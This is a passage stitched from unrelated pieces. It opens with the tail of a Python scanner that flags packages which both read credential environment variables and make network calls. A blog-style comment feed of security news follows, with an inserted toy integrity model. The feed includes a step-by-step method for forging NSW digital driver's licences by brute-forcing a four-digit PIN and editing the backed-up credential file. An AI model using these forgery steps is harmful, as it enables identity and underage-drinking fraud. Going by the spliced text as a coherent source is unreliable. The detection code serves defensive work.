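    env_hits = [(n, line) for n, line in _names(tree) if n in ENV_READS]
    net_hits = [(n, line) for n, line in _names(tree) if _is_net(n)]
    # Statements outside def/class bodies execute on import, which for a
    # setup.py means during installation.
    top_level_network = any(
        _is_net(n)
        for stmt in tree.body
        if not isinstance(stmt, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef))
        for n, _ in _names(stmt)
    )
    return {
        "env_reads": env_hits,
        "network_sinks": net_hits,
        "top_level_network": top_level_network,
        # Both behaviours in one file is the combination worth a human look.
        "suspicious": bool(env_hits and net_hits),
    }


if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SOURCE), ("suspicious", SUSPICIOUS_SOURCE)):
        print(label, scan_source(src))
```

The scanner is a triage aid, not a verdict: a legitimate cloud SDK reads AWS credentials from the environment and talks to the network by design, so the useful signal is the combination appearing in a package that has no business doing either, or appearing for the first time in a new release of a package whose earlier versions did not. Running it over the sdist of a dependency before upgrading, and diffing the result against the previous version, is the workflow it is meant for.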
Tomi Engdahl says:
Researchers to release exploit for new VMware auth bypass, patch now https://www.bleepingcomputer.com/news/security/researchers-to-release-exploit-for-new-vmware-auth-bypass-patch-now/
Proof-of-concept exploit code is about to be published for a vulnerability that allows administrative access without authentication in several VMware products. Identified as CVE-2022-22972, the security issue received a fix last Wednesday, accompanied by an urgent warning for administrators to install the patch or apply mitigations immediately.
In an advisory on May 18th, VMware warned that the security implications for leaving CVE-2022-22972 unpatched are severe as the issue is “in the critical severity range with a maximum CVSSv3 base score of 9.8,” with 10 being the maximum.
The flaw affects VMware Workspace ONE Access, Identity Manager, and vRealize Automation. The company warns that attackers with access to the appliance interface can use it to bypass authentication to reach local domain users.
Tomi Engdahl says:
Fake Windows exploits target infosec community with Cobalt Strike https://www.bleepingcomputer.com/news/security/fake-windows-exploits-target-infosec-community-with-cobalt-strike/
A threat actor targeted security researchers with fake Windows proof-of-concept exploits that infected devices with the Cobalt Strike backdoor. Whoever is behind these attacks took advantage of recently patched Windows remote code execution vulnerabilities tracked as CVE-2022-24500 and CVE-2022-26809. Last week, a threat actor published two proof-of-concept exploits for the Windows CVE-2022-24500 and CVE-2022-26809 vulnerabilities on GitHub. These exploits were published in repositories for a user named ‘rkxxz’, which have since been taken down and the account removed.
Tomi Engdahl says:
“Tough to forge” digital driver’s license is easy to forge https://arstechnica.com/information-technology/2022/05/digital-drivers-license-used-by-4m-australians-is-a-snap-to-forge/
In late 2019, the government of New South Wales in Australia rolled out digital driver’s licenses. The new licenses allowed people to use their iPhone or Android device to show proof of identity and age during roadside police checks or at bars, stores, hotels, and other venues. ServiceNSW, as the government body is usually referred to, promised it would “provide additional levels of security and protection against identity fraud, compared to the plastic [driver's license]” citizens had used for decades. Now, 30 months later, security researchers have shown that it’s trivial for just about anyone to forge fake identities using the digital driver’s licenses, or DDLs. The technique allows people under drinking age to change their date of birth and for fraudsters to forge fake identities. The process takes well under an hour, doesn’t require any special hardware or expensive software, and will generate fake IDs that pass inspection using the electronic verification system used by police and participating venues. All of this, despite assurances that security was a key priority for the newly created DDL system.
Tomi Engdahl says:
Chrome 102 Patches 32 Vulnerabilities
https://www.securityweek.com/chrome-102-patches-32-vulnerabilities
Google on Tuesday announced the stable channel release of Chrome 102, which patches 32 vulnerabilities, including a critical flaw reported by an anonymous researcher.
The critical security hole, tracked as CVE-2022-1853, has been described as a use-after-free bug affecting Indexed DB. Google learned about it on May 12 and it has yet to determine the bug bounty for this vulnerability.
Chrome 102 also addresses eight high-severity vulnerabilities reported by external researchers. Based on the rewards announced so far — the bug bounty is still being determined for some issues — the most serious of them is CVE-2022-1854, a use-after-free affecting the ANGLE component of the web browser. Researcher SeongHwan Park received $10,000 for reporting the weakness to Google.
Use-after-free vulnerabilities can typically be exploited for data corruption, DoS attacks or arbitrary code execution. In the case of Chrome, these types of bugs could also allow an attacker to escape the browser’s sandbox, but they might need to be combined with another vulnerability.
The list of high-severity vulnerabilities patched in the latest Chrome release also includes CVE-2022-1855, a use-after-free in Messaging that earned a researcher $7,500, and CVE-2022-1856, a use-after-free in User Education that Google rewarded with $3,000.
Fifteen of the vulnerabilities reported by external researchers were assigned a severity rating of “medium” or “low.” However, it’s worth noting that three of the medium-severity issues earned $5,000 rewards, and one low-severity flaw received a $7,000 reward.
Tomi Engdahl says:
Google Discloses Details of Zoom Zero-Click Remote Code Execution Exploit
https://www.securityweek.com/google-discloses-details-zoom-zero-click-remote-code-execution-exploit
Google’s Project Zero has disclosed the details of a zero-click remote code execution exploit targeting the Zoom video conferencing software.
Project Zero’s Ivan Fratric has described an exploit chain that can be used by a malicious actor to compromise a Zoom user over the chat feature — without user interaction — by sending them a message over the XMPP protocol. Part of Fratric’s exploit chain has been dubbed “XMPP Stanza Smuggling.”
Fratric has described a total of six vulnerabilities. Two of the flaws, tracked as CVE-2022-25235 and CVE-2022-25236, actually impact the popular open source XML parser Expat.
Since the library is used in many projects, several major vendors have released advisories to inform their customers about the impact of these and other Expat vulnerabilities, including IBM, Aruba, various Linux distributions, Oracle, and F5.
The Zoom-specific vulnerabilities found by Fratric have been described by Zoom as high- and medium-severity issues related to improper XML parsing (CVE-2022-22784), update package downgrading (CVE-2022-22786), insufficient hostname validation (CVE-2022-22787), and improperly constrained session cookies (CVE-2022-22785).
CVE-2022-22786 affects Zoom Client for Meetings for Windows and Zoom Rooms for Conference Room for Windows. The rest affect Zoom Client for Meetings on all desktop and mobile platforms.
Tomi Engdahl says:
Trend Micro Patches Vulnerability Exploited by Chinese Cyberspies
https://www.securityweek.com/trend-micro-patches-vulnerability-exploited-chinese-cyberspies
Cybersecurity company Trend Micro has updated one of its products to patch a vulnerability that has been exploited by a threat actor linked to China.
The threat actor’s activities have been analyzed by endpoint security firm SentinelOne, which tracks the group as Moshen Dragon. Some overlaps have been found with groups tracked by others as RedFoxtrot and Nomad Panda.
In a recent advisory, Trend Micro said only its Trend Micro Security consumer product is affected, and a fix was deployed through the company’s ActiveUpdate system on May 19.
https://success.trendmicro.com/dcx/s/solution/000291042?language=en_US
Tomi Engdahl says:
Dan Goodin / Ars Technica:
A researcher says Australia’s New South Wales digital driver’s license is easy to forge due to deficient encryption, data validation flaws, and other issues — A litany of security flaws allows forgeries that are easy, quick, and cheap. — In late 2019, the government of New South Wales …
“Tough to forge” digital driver’s license is… easy to forge
A litany of security flaws allows forgeries that are easy, quick, and cheap.
https://arstechnica.com/information-technology/2022/05/digital-drivers-license-used-by-4m-australians-is-a-snap-to-forge/
In late 2019, the government of New South Wales in Australia rolled out digital driver’s licenses. The new licenses allowed people to use their iPhone or Android device to show proof of identity and age during roadside police checks or at bars, stores, hotels, and other venues. ServiceNSW, as the government body is usually referred to, promised it would “provide additional levels of security and protection against identity fraud, compared to the plastic [driver's license]” citizens had used for decades.
Now, 30 months later, security researchers have shown that it’s trivial for just about anyone to forge fake identities using the digital driver’s licenses, or DDLs. The technique allows people under drinking age to change their date of birth and for fraudsters to forge fake identities. The process takes well under an hour, doesn’t require any special hardware or expensive software, and will generate fake IDs that pass inspection using the electronic verification system used by police and participating venues. All of this, despite assurances that security was a key priority for the newly created DDL system.
A better mousetrap hacked with minimal effort
“When an unsuspecting victim scans the fraudster’s QR code, everything will check out, and the victim won’t know that the fraudster has combined their own identification photo with someone’s stolen Driver’s Licence details,” he continued. As things have stood for the past 30 months, however, DDLs make it “possible for malicious users to generate [a] fraudulent Digital Driver’s Licence with minimal effort on both jailbroken and non-jailbroken devices without the need to modify or repackage the mobile application itself.”
DDLs require an iOS or Android app that displays each person’s credentials. The same app allows police and venues to verify that the credentials are authentic. Features designed to confirm the ID is authentic and current include:
Animated NSW Government logo.
Display of the last refreshed date and time.
A QR code expires and reloads.
A hologram that moves when the phone is tilted.
A watermark that matches the license photo.
Address details that don’t require scrolling.
Surprisingly simple
The technique for overcoming these safeguards is surprisingly simple. The key is the ability to brute-force the PIN that encrypts the data. Since it’s only four digits long, there are only 10,000 possible combinations. Using publicly available scripts and a commodity computer, someone can learn the correct combination in a matter of a few minutes, as this video, showing the process on an iPhone, demonstrates.
Once a fraudster gets access to someone’s encrypted DDL license data—either with permission, by stealing a copy stored in an iPhone backup, or through remote compromise—the brute force gives them the ability to read and modify any of the data stored on the file.
From there, it’s a matter of using simple brute-force software and standard smartphone and computer functions to extract the file storing the credential, decrypting it, changing the text, re-encrypting it, and copying it back to the device. The precise steps on an iPhone are:
Use iTunes backup to copy the contents of the iPhone storing the credential the fraudster wants to modify
Extract the encrypted file from the backup stored on the computer
Use brute-force software to decrypt the file
Open the file in a text editor and modify the birth date, address, or other data they want to fake
Re-encrypt the file
Copy the re-encrypted file to the backup folder and
Restore the backup to the iPhone
With that, the ServiceNSW app will display the fake ID and present it as genuine.
Death by 1,000 flaws
A variety of design flaws make this simple hack possible.
The first is a lack of adequate encryption. A key based on a four-digit PIN is woefully inadequate.
The next major flaw is that, astonishingly, DDL data is never validated against the back-end database to make sure that what’s stored on the iPhone matches records maintained by the government department.
The third shortcoming is that using the “pull-to-refresh” function—a cornerstone of the DDL verification scheme intended to ensure the most current information is showing—fails to refresh any of the data stored in the electronic credential. Instead, it updates only the QR code. A better response would be for the pull-to-refresh function to download the latest copy of the DDL from the ServiceNSW database.
Fourth, the QR code transmits only the DDL holder’s name and status as either over or under the age of 18. The QR code is supposed to allow the person checking the ID to scan it with their own ServiceNSW app to validate that the data presented is authentic. To bypass the check, a fraudster only needs to obtain the driver’s license details from a stolen or otherwise-obtained DDL and replace it locally on their phone.
“When an unsuspecting victim scans the fraudster’s QR code, everything will check out, and the victim won’t know that the fraudster has combined their own identification photo with someone’s stolen Driver’s Licence details,” Farmer explained. Had the system returned the legitimate image data, the scanning party would easily see that the fraudster had forged the DDL, since the face returned by Service NSW wouldn’t match the face displayed on the app.
The last flaw the researcher identified was that the app allows the data it stores to be backed up and restored at all. While all files stored in the Documents and Library/Application Support/ folders are backed up by default, iOS allows developers to easily exclude certain files from backup by calling NSURL setResourceValue:forKey:error: with the NSURLIsExcludedFromBackupKey key.
With a reported 4 million NSW residents using the DDLs, the gaffe could have serious consequences for anyone who relies on DDLs to verify identities, ages, addresses, or other personal information.
Farmer noted this tweet, which called out a hotel bar for refusing service to someone who had only physical ID and instead accepting only DDLs. “I know 10 kids that you let in regularly with fake digital licenses because they are easy to make,” the person claimed.
While the veracity of that claim can’t be verified, it certainly sounds plausible, given the ease and effectiveness of the hack shown here.
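Two of the design points in that write-up (a PIN-encrypted file carries no integrity, and the verifier never compares the displayed data or photo with the issuer's record) can be shown in a small model. The block below is an added example with a constructed design and constructed records; it is not ServiceNSW's scheme or the researcher's code. It uses an HMAC with an issuer-held key for brevity, so the verifier here shares that key; a deployed system would use a public-key signature so verifiers hold only the public key, and the property demonstrated is the same. The licence number, name, date of birth, photo bytes and the fixed check date are all constructed.

```python
"""Toy model of two controls the DDL write-up says were missing: an integrity
tag over the stored credential that the phone cannot recompute, and a verifier
that checks the issuer's record (photo included) instead of trusting the data
on the device. Added example with a constructed design and constructed records;
it is not ServiceNSW's or the researcher's code."""
import hashlib
import hmac
import json
from datetime import date

ISSUER_KEY = b"constructed-issuer-secret"   # known only to the issuing authority
CHECK_DATE = date(2022, 5, 25)              # fixed "today" so the example is deterministic

# Constructed authoritative records, keyed by licence number.
ISSUER_DB = {
    "DL-1001": {
        "name": "Alex Sample",
        "dob": "2006-02-14",
        "photo_sha256": hashlib.sha256(b"constructed-photo-of-alex").hexdigest(),
    },
}


def _canonical(record):
    """Stable serialisation so the tag covers exactly the fields that are shown."""
    return json.dumps(record, sort_keys=True, separators=(",", ":")).encode()


def issue_credential(licence_no):
    """Issuer tags the whole record; the phone stores record + tag. Encrypting the
    file under a PIN-derived key gives confidentiality at best; this gives integrity."""
    record = dict(ISSUER_DB[licence_no], licence_no=licence_no)
    tag = hmac.new(ISSUER_KEY, _canonical(record), hashlib.sha256).hexdigest()
    return {"record": record, "tag": tag}


def tag_is_valid(cred):
    """Integrity check over the stored record; any local edit invalidates the tag."""
    expected = hmac.new(ISSUER_KEY, _canonical(cred["record"]), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, cred["tag"])


def is_over_18(dob_iso, today=CHECK_DATE):
    dob = date.fromisoformat(dob_iso)
    age = today.year - dob.year - ((today.month, today.day) < (dob.month, dob.day))
    return age >= 18


def weak_qr_payload(cred):
    """What the article says the QR carried: name plus over/under 18, both
    derived from whatever the phone has stored locally."""
    rec = cred["record"]
    return {"name": rec["name"], "over_18": is_over_18(rec["dob"])}


def edit_stored_dob(cred, new_dob):
    """Models the local edit the article describes: the stored file is changed
    and written back, while the issuer's tag stays as it was."""
    return {"record": dict(cred["record"], dob=new_dob), "tag": cred["tag"]}


def verify_against_issuer(licence_no, shown_photo_sha256, shown_dob):
    """Online check: compare what the phone displays with the issuer's record.
    Returns the disagreeing fields; an empty list means the display is consistent."""
    authoritative = ISSUER_DB.get(licence_no)
    if authoritative is None:
        return ["licence_no"]
    mismatches = []
    if authoritative["dob"] != shown_dob:
        mismatches.append("dob")
    if authoritative["photo_sha256"] != shown_photo_sha256:
        mismatches.append("photo")
    return mismatches


if __name__ == "__main__":
    genuine = issue_credential("DL-1001")
    edited = edit_stored_dob(genuine, "2001-02-14")
    print("weak QR, genuine :", weak_qr_payload(genuine))   # over_18 False
    print("weak QR, edited  :", weak_qr_payload(edited))    # over_18 True: passes the weak check
    print("tag valid, edited:", tag_is_valid(edited))       # False
    print("issuer check     :", verify_against_issuer(
        "DL-1001", edited["record"]["photo_sha256"], edited["record"]["dob"]))  # ['dob']
```

The weak QR payload reports the edited record as over 18 because it trusts device data, which is the failure the article describes; the tag check catches the edit offline, and the issuer comparison catches both an edited date of birth and a photo that does not belong to the licence number, which is the swapped-photo case Farmer raised.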
Tomi Engdahl says:
Spyware companies are selling governments a backdoor into Android devices; Chrome is also a target
https://www.kauppalehti.fi/uutiset/vakoiluohjelmayhtiot-kauppaavat-valtioille-takaovea-android-laitteisiin-kohteena-myos-chrome/b4ae3f1b-7f82-477d-aabd-d2b81cad1605
Shady spyware companies sold access to several zero-day vulnerabilities in Chrome and Android, Google revealed on Monday. The companies’ customers have included state-linked hackers.
Tomi Engdahl says:
Microsoft gave Linux users a vague warning
https://www.tivi.fi/uutiset/tv/3d2b259a-34de-4722-8725-7814d8873f31
Microsoft’s security researchers have observed a sharp increase in the use of the XorDdos malware, which targets Linux servers.
Tomi Engdahl says:
Airline passengers left stranded after ransomware attack https://www.bitdefender.com/blog/hotforsecurity/airline-passengers-left-stranded-after-ransomware-attack/
An Indian airline says that an “attempted ransomware attack” against its IT infrastructure caused flights to be delayed or canceled, and left passengers stranded. Flights with popular Indian budget airline SpiceJet were disrupted by the cyber attack on Tuesday night, but the firm initially downplayed the impact of the attack – claiming that it had merely “slowed down morning flight departures”.
Tomi Engdahl says:
Operation Delilah: Unit 42 Helps INTERPOL Identify Nigerian Business Email Compromise Actor https://unit42.paloaltonetworks.com/operation-delilah-business-email-compromise-actor/
Today, INTERPOL and The Nigeria Police Force announced the arrest of a prominent business email compromise (BEC) actor who has been active since 2015. His apprehension marks the latest success for Operation Delilah – a counter-BEC operation that began in May 2021 and has involved international law enforcement and industry cooperation across four continents.
Tomi Engdahl says:
Darknet market Versus shuts down after hacker leaks security flaw https://www.bleepingcomputer.com/news/security/darknet-market-versus-shuts-down-after-hacker-leaks-security-flaw/
The Versus Market, one of the most popular English-speaking criminal darknet markets, is shutting down after discovering a severe exploit that could have allowed access to its database and exposed the IP address of its servers.